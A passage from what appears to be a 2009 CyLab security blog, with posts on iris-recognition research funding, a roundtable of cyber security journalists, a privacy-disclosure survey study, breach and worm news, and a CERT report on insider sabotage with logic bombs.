One intriguing Swedish start-up, BehavioSec offers what it calls the "first Continuous Authentication of end users through Behaviometrics (behavioral biometrics)." The product, Behavio, is based on a "innovative technology that exploits the user's unique behavior while using a keyboard and mouse to create a token that cannot be replicated."

But the winner of the competition (and my personal choice as well) was Alert Enterprise of Fremont, California. Using "graphical, geospatial monitoring, alerting, mitigation, multi-source analytics," etc., the Fremont, California-based start-up's two products, AlertAccess and AlertAction, are intended to address the dangerous gap between cyber security, physical security and control system security in the enterprise.

Considering that there will no doubt be a lot of mile-high talk about "the Cloud" over the next few days, bestowing an award -- this first evening of the conference -- on a product that deals with how the physical and cyber worlds interpenetrate and what that means to risk mitigation in both spheres was not only deserved but quite meaningful symbolically.

-- Richard Power

Sunday, April 19, 2009

DoD Awards $1.5 Million Grant for CyLab Iris Recognition Research



"This is a huge breakthrough," said Robert Baer, a former CIA operative, who is familiar with Savvides' work on real-time iris recognition. Baer's book, "See No Evil: The True Story of a Ground Soldier in the CIA's War on Terrorism," was made into the 2005 film, "Syriana," starring George Clooney. Pittsburgh Tribune-Review, 4-19-09

DoD Awards $1.5 Million Grant for CyLab Iris Recognition Research

The CyLab Biometrics Lab, led by Mario Savvides, continues to the push the envelope.

Excerpt from the Pittsburgh Tribune-Review, with a link to the full text:

Iris and face recognition soon could be the new fingerprints for criminal investigators and even U.S. troops, thanks in part to researchers at Carnegie Mellon University.
Though troops use iris-recognition technology in Iraq, targets must remain stationary for several seconds and at a distance of about 13 centimeters, roughly 5 inches, for the camera to work, said Marios Savvides, a CMU professor of electrical and computer engineering who directs the school's CyLab Biometrics Lab.
"We are improving the way we do forensic analysis," Savvides said. "We're providing tools so computers do this automatically."
The Department of Defense awarded $1.5 million in grants to Savvides and his team earlier this week to help them develop an iris-recognition system that instantly will identify unique iris markers in the eyes of people moving up to 13 meters away, or about 43 feet.
"This is a huge breakthrough," said Robert Baer, a former CIA operative, who is familiar with Savvides' work on real-time iris recognition. Baer's book, "See No Evil: The True Story of a Ground Soldier in the CIA's War on Terrorism," was made into the 2005 film, "Syriana," starring George Clooney.
Pittsburgh Tribune-Review, 4-19-09

Some Related Posts:

CyLab Chronicles Q&A with Mario Savvides

CyLab News: CyLab's Savvides Invited to Speak at NSA Conference

CyLab Researcher Selected To Join New Center For Academic Studies In Identity Sciences

CyLab News: Information Security Magazine Highlights CyLab’s Lead in Vital Research

CyLab Researchers Developing New Technology to Detect Enemies

Thursday, April 16, 2009

CyLab Virtual Roundtable on Cyber Security News Media



The single most important trend will continue to be exposing just how deeply the bad guys -- both cyber criminals motivated by financial gain, as well as nation states -- have penetrated nearly every aspect of our economy, government and private industry. Brian Krebs, Washington Post

It seems that today, while there is a lot of data on security, the data that matters is far harder to uncover. Robert Lemos, SecurityFocus

Vendors try to push their compliance, encryption and data loss prevention products on this notion that brand reputation is irreparably harmed in a breach, but it just ain't so. Michael Mimoso, Information Security Magazine

A very good journalist once said to me that often, the most important decision a reporter can make is *not* to write a story. It's hard in this beat. Bob Sullivan, MSNBC

CyLab Virtual Roundtable on Cyber Security News Media

-- Richard Power


The professional challenges of cyber security are daunting. The problems confronted are extremely complex. The stakes are very high. You often find yourself the bearer of bad news, surrounded by Pollyannas and Chicken Littles. The priorities you are handed are often skewed. The motivations you encounter are often mixed. The resources you are allocated are usually inadequate. The executive mandates issued are typically tepid. Technological advancements race at light speed; meanwhile, organizational reforms crawl around in circles, at a snail's pace.

The professional challenges of cyber security journalism are almost as daunting. You must report on stories that, in large part, cannot be told, drawing on people who, in large part, cannot be quoted, and referencing statistics that are, in large part, suspect. All the while, you must separate hard news from hyperbole and be certain you are not the unwitting agent of some hidden agenda. And in the end, you must deliver a product that is comprehensible, informative, engaging and succinct to a public that is both skeptical and naive, distracted and over-stimulated.

Having experienced both sets of challenges first-hand, I have a great empathy and respect for those who endeavor to overcome them.

So here and now, in 2009, as we prepare (incredibly) to close out the first decade of the 21st Century, I felt it would be insightful and thought-provoking to check in with some of the best journalists covering the cyber security beat.

This virtual roundtable includes four friends and colleagues of mine, two from mainstream news media, two from cyber security industry news media, sharing their perspectives in response to four important questions.

The Washington Post's Brian Krebs has an excellent blog, Security Fix.

MSNBC's Bob Sullivan also has an excellent blog, Red Tape Chronicles.

Michael Mimoso is Editor in Chief for leading industry publication, Information Security Magazine (aka SecuritySearch.com online)

Robert Lemos is a freelance technology journalist and acts as the managing editor for Symantec's great site, SecurityFocus.

Enjoy.

What is the greatest journalistic challenge in covering cyber security? What element of the subject matter makes the assignment most difficult?

Brian Krebs, Washington Post: Probably the greatest challenge is getting people to care, and learn enough so that they can be a catalyst for helping others understand how important this issue is. The subject matter itself makes the assignment difficult: Explaining the latest threats simply and offering easy solutions without overburdening readers is a huge challenge, and one that becomes even more daunting every day. Here we have a communications medium that has become so central to everyone's lives, yet so few people have a grasp even the basics of how it works, or how they could live without it, until...well, for one reason or another usually related to insecurity, they are forced to live without it, however temporarily. The challenge is to grab the reader at those teachable moments, and use those to turn people into converts who place security on par with checking the sports scores, or all of the rest of the issues normal people care about on a day-to-day basis. That may sound unrealistic, but consider that the world we live in is only becoming more networked and linked together every day. What's more, very few readers have a sense of how a failure to stay educated about this medium contributes to the problem globally. A person whose PC or Web site is being used to blast out spam or host phishing Web sites, for example, is unlikely to ever be negatively affected by that experience. In addition, there are larger public policy and public safety issues stemming from computer and Internet insecurity that rise to the level of nation state concerns. These concerns also usually trace back to apathy, a lack of awareness, or a failure to act at an individual level.

Robert Lemos, SecurityFocus: For many journalists, the technical nature of cyber security can be a significant problem. Yet, for the most part, my readership comes from the security world, so the technical aspects of the beat are not as great a barrier. The real problem with cybersecurity is that there is a paucity of good data about security problems. Part of the issue is that companies do not want to talk about attacks or about their systems' weaknesses.
While such reticence may have been understandable in the past, times have changed. Fueled by easy -- albeit, unauthorized -- access to sensitive systems, espionage is undergoing a revival. Corporate computer systems are regularly being compromised by targeted attacks.
The networks of government agencies are being infiltrated by -- if not state-sponsored, then state-condoned -- hackers.
This is not just a journalism issue; it's a general security issue. A major government contractor had serious issues with the Conficker worm, but they would not talk about it on the record. When you can't understand the scope of a problem, it's difficult to combat the problem.

Michael Mimoso, Information Security Magazine: Off the top, you would think it would be the unwillingness of sources, especially in corporate and government settings, to speak to journalists about incidents, technology choices, best practices or anything else they believe might expose them to attack. And that's clearly understandable.
But I think the biggest challenge is that the majority of journalists are just that, journalists. Many of us don't have the technical background that our audience has, and yet our job, our mission, is to inform an audience that is closer to the subject matter than we will ever be. No matter what amount of homework I do on my own and how many security researchers I know and trust for information, my readers know the material better than I do and if I miss with an article, I'm going to get called on it. Ultimately, that makes me a better journalist, and forces me to be very careful and cynical of vendor FUD and hype.
Overall, I think the security media does a solid job, but a lot of our good work gets undone by the mainstream media. The mainstream media isn't as discriminating with its coverage-just look at Conficker and, for example, what 60 Minutes did with its piece-and ultimately, I think we're all painted with the same brush, which does a disservice to both our audiences.

Bob Sullivan, MSNBC: #1. The 'spook' factor, or the junior g-man factor. No one, it seems, ever wants to put their name on anything. So the stories are all reduced to "I know a guy who knows a guy who..says the Internet almost melted down last week." As a journalist I hate those stories. Combine that with the national security issue, and boy it's difficult.
#2. It's so easy to plant a scary story in some media outlet somewhere, which leads many editors to run into their newsrooms and say, "Why don't we have this story?" Similarly, it's easy to get front-page treatment when you write about a potential disaster, but hard when you write an even-handed story suggesting this or that might be overblown. A very good journalist once said to me that often, the most important decision a reporter can make is *not* to write a story. It's hard in this beat.

How has the cyber security beat changed over the years? How is it different now than it was five or ten years ago?

Krebs: Cyber security as a concern is far more "in-your-face" that it ever was. Today, it is possible for people to find their Web browser, Facebook or Twitter account or whatever they use to interact online, hijacked by cyber thieves just by clicking on a link.
This type of activity is only the most visible symptom of a much larger problem, which is that hackers are now entirely motivated by financial gain, combined with very little chance of getting caught. They are organized, they reinvest their gains to make future attacks and scams more believeable, robust, and scalable, and they are more brazen and successful than ever.

Lemos: It's a cliche when talking about "The Old Days" -- which in Internet time is the early 90s, of course -- but they were a lot simpler. Journalists had better access to hackers and even the criminals who were circumventing computer security for fun and profit. Hackers and academic security researchers use to be open about what they were doing, and even when they weren't, techniques for hiding data were seldom used, so an enterprising reporter could learn more.
When at ZDNet in the late 1990s, I worked with other reporters there to analyze telltale information in the Melissa virus to help find out more about the author. With worms and attacks that followed -- from ILoveYou to Code Red to the MSBlast worm -- data became scarcer and scarcer. With MSBlast, Microsoft let slip that they had cleaned more than 8 million instances of the worm from systems, an unprecedented number. After it reached 25 million, the company stopped talking about the data. With the Conficker worm, there seems to be a lot less discussion about how widely it has spread. It seems that today, while there is a lot of data on security, the data that matters is far harder to uncover.

Mimoso: The story is much different. Two things have changed from 2000 when I started covering security: regulation and cybercrime. Security professionals in many instances have become compliance professionals. Investments in technology are often made based on a regulation an organization has to comply with. Policy decisions are often made based on a regulation an organization has to comply with.
That often leaves organizations with misguided priorities and a false sense of security. Cybercrime, meanwhile, is getting more pervasive and dangerous. It's the quiet attacks that should worry companies and individuals, more so than the splashy TJX-style data breaches. Hackers are using stealthy web-based malware to steal money from bank accounts, or intellectual property from large organizations. They're also conducting sophisticated denial-of-service attacks using botnets comprised of tens of thousands of compromised machines, in order to extort companies for large sums of money. All of this is incredibly troubling, profitable for the criminal and not going away any time soon.

Sullivan: Certainly, the spotlight has faded. Ten years ago, DefCon was actually interesting to a national audience. The Melissa virus really did impact everyone. Paradoxically, today's threats are more serious, involve much more money, etc., and yet they no longer capture the national audience quite as readily as they once did. That's not to say they don't capture attention at all -- certainly a big ID theft case, or a big virus, still nets big attention. But think about this: how many credit card have to be stolen for something to be a big story nowadays? The initial ChoicePoint story involved fewer than 100,00 records, and made front pages all around the country. Today, no one would even cover that story.

What is the most pervasive false meme that you confront among your editors and readers? What is the biggest blind-spot out there?

Krebs: The idea that information security is something that is somehow beyond the capability or understanding of the average Internet user is a false meme that I encounter quite often. The reality is that it isn't realistic to expect people to protect themsleves from 100 percent of the threats 100 percent of the time, nor would you want people to live that way. That said, being safe online, being smart about your identity, avoiding scams and generally not being sucked into contributing to activities that scam or attack others, requires very few, relatively simple steps, mixed with a little bit of common sense.

Lemos: SecurityFocus readers are pretty savvy people, so this is less of a problem for me than most reporters. In the general populace, I see a lack of understanding of the insecurity of people's data and identity. We are still worried about breaches that release Social Security numbers, for example. In reality, we should assume that everyone's Social Security number has already been released and develop systems that do not rely on that piece of information as a key to our credit reports and financial data. Also, it still seems that people believe that somehow -- through security software and patching -- the threat of having your computer system compromised can be mitigated. It can only be reduced. Microsoft and others have documented that cybercriminals are focused on fooling users, not using technical exploits, to compromise computer systems. The biggest vulnerability on most computer systems is the user, and attackers have recognized that.

Mimoso: Data breaches hurting brand reputation. It's just not true. I think you'd be hard-pressed to find a company-aside from CardSystems which was ultimately forced to go dark before its assets were acquired-that was negatively impacted by a data breach. TJX is a good example. It is still cruising along; yes there was an initial hit to the stock price once news of the breach hit, but as of last summer, shares were selling higher than at any point since 2004. Vendors try to push their compliance, encryption and data loss prevention products on this notion that brand reputation is irreparably harmed in a breach, but it just ain't so. Same goes for data breach disclosure laws; while these laws have increased awareness around the importance of protecting data and identity theft, they have done little to make processes or systems more secure. And they do very little to influence customer behavior, especially with credit card breaches where very little liability is passed to the consumer.

Sullivan: I think it's really hard to steer both editors and readers towards the things that are really important, but perhaps more subtle. Every week there's a new study out that shows viruses are up, or vulnerabilities are up, or hacking attempts are up, and these make for great headlines. But the studies are often poorly designed and don't mean much. On the other hand, for example, I really want people to think twice before they sign up for supermarket loyalty cards and EZ-Pass and those kinds of invasive technologies. I at least want them to understand the consequences before they do it. How do I make that story sexy enough to compete with a story about an alleged Internet meltdown that's coming? There's no easy answer.

From your perspective as a journalist, what issues and trends jump out at you as particularly important or dominant in the coming year?

Krebs: A major contributor to the success of these gangs is that the most powerful nation on Earth still can do very little to touch cyber criminals operating in certain countries. The single most important trend will continue to be exposing just how deeply the bad guys -- both cyber criminals motivated by financial gain, as well as nation states -- have penetrated nearly every aspect of our economy, government and private industry. Longer term, if this situation does not change, if we cannot succeed in bringing cyber gangs to jutice, we will have missed an important opportunity. I believe that five or ten years from now, we may well look back fondly on the age we live in now as a time when we still had an opportunity to kill some of this cyber crime in the crib and disperse the organizations that are driving it. I believe our inability to apprehend and bring to justice those who are responsible for stealing hundreds of millions of dollars from consumers and businesses is going to haunt us down the road, as these groups mature, become more emboldened, and more entrenched in the political and economic classes of the countries that act as safe havens for them.

Lemos: The most important trend is that, in the midst of a boom in cybercrime and cyber espionage, the United States and other nations have started formulating better defensive strategies and a doctrine for offensive actions in cyberspace. Whether these nations create a good policy or create policies that attempt to control the Internet for no real gain, will be a significant story over the next few years.

Mimoso: The economy. It's going to be interesting to see how the recession impacts the emphasis companies place on information security. For instance, are important security projects/investments going to be tabled or canceled altogether? A lot of companies are paying lip service right now to the importance of keeping data and customer information secure and maintaining the integrity of security programs during this downturn. But security is traditionally a cost center where ROI is extremely difficult to prove. We'll see if the bottom line ultimately wins out. An offshoot of the recession too is whether we'll see additional regulation coming out of this. Chances are we will, but it will likely take some time before we see any real impact.

Sullivan: 1. Attackers targeting Facebook and other social networking tools.
2. Cyber cold war: Real now?
3. Impact of the economic downturn on security. Companies cutting back? Layoff revenge? Consumers taking more risks?

Wednesday, April 15, 2009

CyLab Seminar Series: Of Frogs, Herds, Behavioral Economics, Malleable Privacy Valuations, and Context-Dependent Willingness to Divulge Personal Info


[NOTE: CyLab's weekly seminar series provides a powerful platform for the highlighting vital research. The physical audience in the auditorium is composed of Carnegie Mellon University faculty and graduate students, but CyLab's corporate partners also have access via the World Wide Web. On a frequent basis, CyBlog will wet your appetite by offering brief glimpses into these talks. Here are my notes from a talk delivered by Alessandro Acquisti on 4-6-09. -- Richard Power]

The boiling frog story states that a frog can be boiled alive if the water is heated slowly enough — it is said that if a frog is placed in boiling water, it will jump out, but if it is placed in cold water that is slowly heated, it will never jump out. Wikipedia

CyLab Seminar Series Notes: Of Frogs & Herds, Behavioral Economics, Malleable Privacy Valuations, & Context-Dependent Willingness to Divulge Personal Info

Carnegie Mellon University CyLab researcher Alessandro Acquisti, Assistant Professor of Information Technology and Public Policy at Carnegie Mellon’s H. John Heinz III College, always warns his students not to trust Wikipedia; nevertheless, this Boiling Frog story, whether apocryphal or not, provides a useful foil for some fascinating research.

Working with collaborators Leslie John and George Loewenstein, Acquisti has been delving into the mysteries of privacy and security from a behavioral economics perspective. Aquisti and his colleagues see a great application for this particular discipline in the exploration of privacy and security decision-making.

“Behavioral economics is a field of economics that combines psychology plus more traditional economic thinking to understand why people really make decisions, and why certain decisions are sometimes sub-optimal, inconsistent and paradoxical,” Acquisti explains.

Acquisiti’s seminar focused on three studies his team had conducted:

Study 1: The “frog” effect (or lack thereof) on information disclosure.
Study 2: The “herding” effect on information disclosure.
Study 3: The effect of framing on privacy values.

“We feel we are uncovering something novel and peculiar to the privacy area.”

These notes will focus on Study 1.

The research on the “frog” effect explores the impact of privacy intrusions on the propensity to disclose, and in particular, what A sees as “a crucial question, one of the most interesting questions, and one of the most difficult to answer, “Do privacy intrusions (and how we react them) alert or rather desensitize individuals to privacy concerns”

“We live in a society in which every week in the media there is some new event, e.g., exposing personal data on millions of consumers, NSA is spying on domestic communications, passport records of important people are being accessed illegally, etc. Does all of this exposure to privacy intrusions make people believe that well, there is no privacy any longer, so I stop caring; there is so much information out there that there is nothing I can do about it? Or, in fact, is it the opposite, there is so much discussion and so much evidence of intrusions that it will create the opposite effect, at a certain moment, subjects start saying this is too much, enough is enough, and start reacting?”

“This is a difficult question to answer. Because you have to combine longitudinal data and effect, the age effect and the cohort effect, e.g., ‘Do you people use Facebook so much because they are young (age effect) or because they are born in a certain culture (cohort effect)?’ And in the absence of a longitudinal study that tracks people over ten, twenty or thirty years, what we did was simulate a scenario of privacy intrusions by creating a survey of questions with different levels of sensitivity. The sensitivity of the questions ranged from the tame, e.g., ‘Have you ever failed to turn the lights out at home or at work when you left?’ to the intrusive, e.g., ‘Have you ever had sex with the current husband, wife or partner of a friend?’

The survey included ten tame questions, ten moderately intrusive questions, and ten intrusive questions. The design of the survey included randomly assigning respondents to eight different conditions, e.g., the order of the questions, i.e., from tame to intrusive or from intrusive to tame as well as in pseudo-random or sudden order. It was framed as a survey on “ethical behavior.’ Another important factor was when respondents were asked for identifying information, i.e., at the beginning or at the end. “As you can imagine, people were much more willing to give an e-mail address before seeing the survey then after seeing what the survey was about.” The pool of respondents consisted of online readers of the New York Times (NYT), and the survey was linked to from the blog of a NYT op-ed columnist.

“We manipulated the order in which questions were presented to survey participants. Some subjects would see a survey which started with very tame questions and then increasingly became very intrusive. While other subjects started from the very intrusive questions and then went down to questions of lower and lower sensitivity.”


Two hypotheses were tested: the “Frog” hypothesis and the “Coherent Arbitrariness” hypothesis. The “Frog” hypothesis says that people will admit to sensitive behavior more often when they get “warmed up” by getting the tame questions before the more intrusive ones. The “Coherent Arbitrariness” says that people will admit to sensitive behavior less often when they “warmed up” by the survey, because their expectations about the intrusiveness of the survey will be established early on.

The “Coherent Arbitrariness” hypothesis was the one supported.

The “Frog” hypothesis was strongly rejected by the data.

Subjects in the increasing condition admitted to sensitive, moderate, and tame behaviors less often than subjects in other conditions

Subjects in the decreasing condition admitted to sensitive behaviors more often than subjects in other conditions

Bottom line: starting a survey with tame questions, then increasing their intrusiveness, inhibits information disclosure. Sensitive behaviors were more frequently admitted to when asked first.

To read a CyLab Chronicles Q&A with Alessandro Acquisti, click here.

For information on the benefits of partnering with CyLab, contact Gene Hambrick, CyLab Director of Corporate Relations: hambrick at andrew.cmu.edu

Glimpses into the 21st Century Threat Matrix: 285 Million Records Compromised, Success of Twitter Raises Issues, and German Insight on GhostNet


Our forensics team analyzed thousands of data points from investigations around the world – including many never publicly reported – and found that in 2008 alone, more than 285 million records were compromised. That’s more than the previous four years combined. 2009 Data Breach Investigations Report

Four variants of the worm hit Twitter, bringing back memories of the infamous -- and groundbreaking -- Samy worm that snaked through MySpace several years ago. ... Each wave of the worm attacks was more intense than its predecessor, according to a post on the official Twitter blog. SC Magazine, 4-13-09

German intelligence also detected a noticeable increase in cyber attacks before meetings between Merkel and the Dalai Lama. The hackers appear to be particularly interested in the Tibet issue. Der Spiegel, 4-10-09

Glimpses into the 21st Century Threat Matrix: 285 Million Records Compromised, Twitter's Success Raises Issues, & German Insight on GhostNet

Here are some news items, data trends and background stories you might find useful.

The Verizon Business RISKS Team's 2009 Data Breach Investigations Report has been released. It is worthy of your attention. -- Richard Power

Our forensics team analyzed thousands of data points from investigations around the world – including many never publicly reported – and found that in 2008 alone, more than 285 million records were compromised. That’s more than the previous four years combined. The 2009 Verizon Business Data Breach Investigations Report offers an objective view of these data breaches, including analysis that we believe will be helpful to the planning and security efforts of our readers.
Here are just a few of our findings:
* 91% of all compromised records were attributed to organized criminal groups
* 99.6% of records were compromised from servers and applications
* 74% resulted from external sources
* 69% were discovered by a 3rd party
* 67% were aided by significant errors
* 32% implicated business partners
2009 Data Breach Investigations Report

Click here to view the full report.

The recent multiple worm assaults on Twitter raises some interesting issues, e.g., as SC Magazine's Chuck Miller writes in the news item excerpted here, "the threat of client-side attacks across social networking sites."

Twitter was struck by a particularly nasty cross-site scripting worm over the weekend, again bringing to light the threat of client-side attacks across social networking sites.
Four variants of the worm hit Twitter, bringing back memories of the infamous -- and groundbreaking -- Samy worm that snaked through MySpace several years ago. ... Each wave of the worm attacks was more intense than its predecessor, according to a post on the official Twitter blog.
SC Magazine, 4--13-09

But another even bigger issue to ponder is what is means when a technology of any sort (e.g., hardware or software, social networking or telecommunications) can establish such an extraordinary user base so rapidly. According to comScore, "worldwide visitors to Twitter approached 10 million in February, up an impressive 700+% vs. year ago." "The past two months alone have seen worldwide visitors climb more than 5 million visitors. U.S. traffic growth has been just as dramatic," comScore adds, "with Twitter reaching 4 million visitors in February, up more than 1,000% from a year ago." (For more on this data, click here.

Der Spiegel has an excellent piece on the GhostNet story from the German perspective.

The German government is constantly the target of hackers seeking to insert spy programs into its computer systems. The attacks, often originating in China, are becoming more and more sophisticated. ...
Clues about the hackers can be gleaned from the technical characteristics of an attack, as well as the identities of the target and the subject matter. The aim of the attacks leading up to the chancellor's trip to China, for example, was to ferret out information about issues Merkel wanted to discuss with representatives of the People's Republic.
German intelligence also detected a noticeable increase in cyber attacks before meetings between Merkel and the Dalai Lama. The hackers appear to be particularly interested in the Tibet issue. In January 2008, various German officials received an e-mail with an attached document titled: "Analysis of Chinese Government Policy Toward Tibet." The sender was supposedly a Tibetan organization in the United States. A malicious program was hidden in the analysis.
Der Spiegel, 4-10-09

Tuesday, April 7, 2009

Spotlight On: Programming Techniques Used as an Insider Attack Tool



How they strike
Nine of the insiders in these cases inserted malicious code with the intent of causing harm to their organization or to individuals. Six of the insiders used logic bombs to carry out their attacks. Other attacks methods included
• social engineering
• sabotaging backup tapes
• compromising accounts
• deleting and modifying log files
• unauthorized access
• intentionally deploying a virus on customer systems

Spotlight On: Programming Techniques Used as an Insider Attack Tool

Spotlight On: Programming Techniques Used as an Insider Attack Tool

Spotlight On: is a quarterly report issued by the CERT Insider Threat Team.

The Insider Threat Team receives significant funding from CyLab.

As one of their benefits, CyLab's corporate partners receive each issue of Spotlight On three months prior to its public release.

So as Programming Techniques Used as an Insider Attack Tool is released to the public, CyLab's partners are now moving on to Malicious Insiders with Ties to the Internet Underground Community, which we will post here on CyBlog in 3Q09.

Spotlight On: Programming Techniques Used as an Insider Attack Tool includes analysis of numerous cases.

Similarities across Cases
While the number of cases analyzed for this article is limited, there are similarities worth noting. The majority of these cases were IT Sabotage cases,1 which follow the escalation patterns documented in CERT’s MERIT model.2 The MERIT model is a system dynamics model of the insider IT sabotage problem that elaborates complex interactions in the domain and unintended consequences of organizational policies, practices, technology, and culture on insider behavior.
In each of the fifteen cases, changes made by the insider may have been detected prior to the malicious code being deployed had the organization had change controls in place to detect unauthorized modifications to critical systems and software. Some of the organizations did use configuration management tools to track and log changes to critical software. However, either the tools did not prohibit software from being released without approval from a trusted second person, or the organization failed to audit the change control logs for unauthorized changes.
Programming Techniques Used as an Insider Attack Tool

Spotlight On: Programming Techniques Used as an Insider Attack Tool also articulates a number of practices to help in mitigating this particular aspect of the insider threat

See also the third edition of CERT's Common Sense Guide to Prevention and Detection of Insider Threats, and its empirically-based insider threat risk assessment diagnostic.

To read a CyLab Chronicles Q&A with CERT Insider Threat Team leader Dawn Capelli, click here.

For information on the benefits of partnering with CyLab, contact Gene Hambrick, CyLab Director of Corporate Relations: hambrick at andrew.cmu.edu

-- Richard Power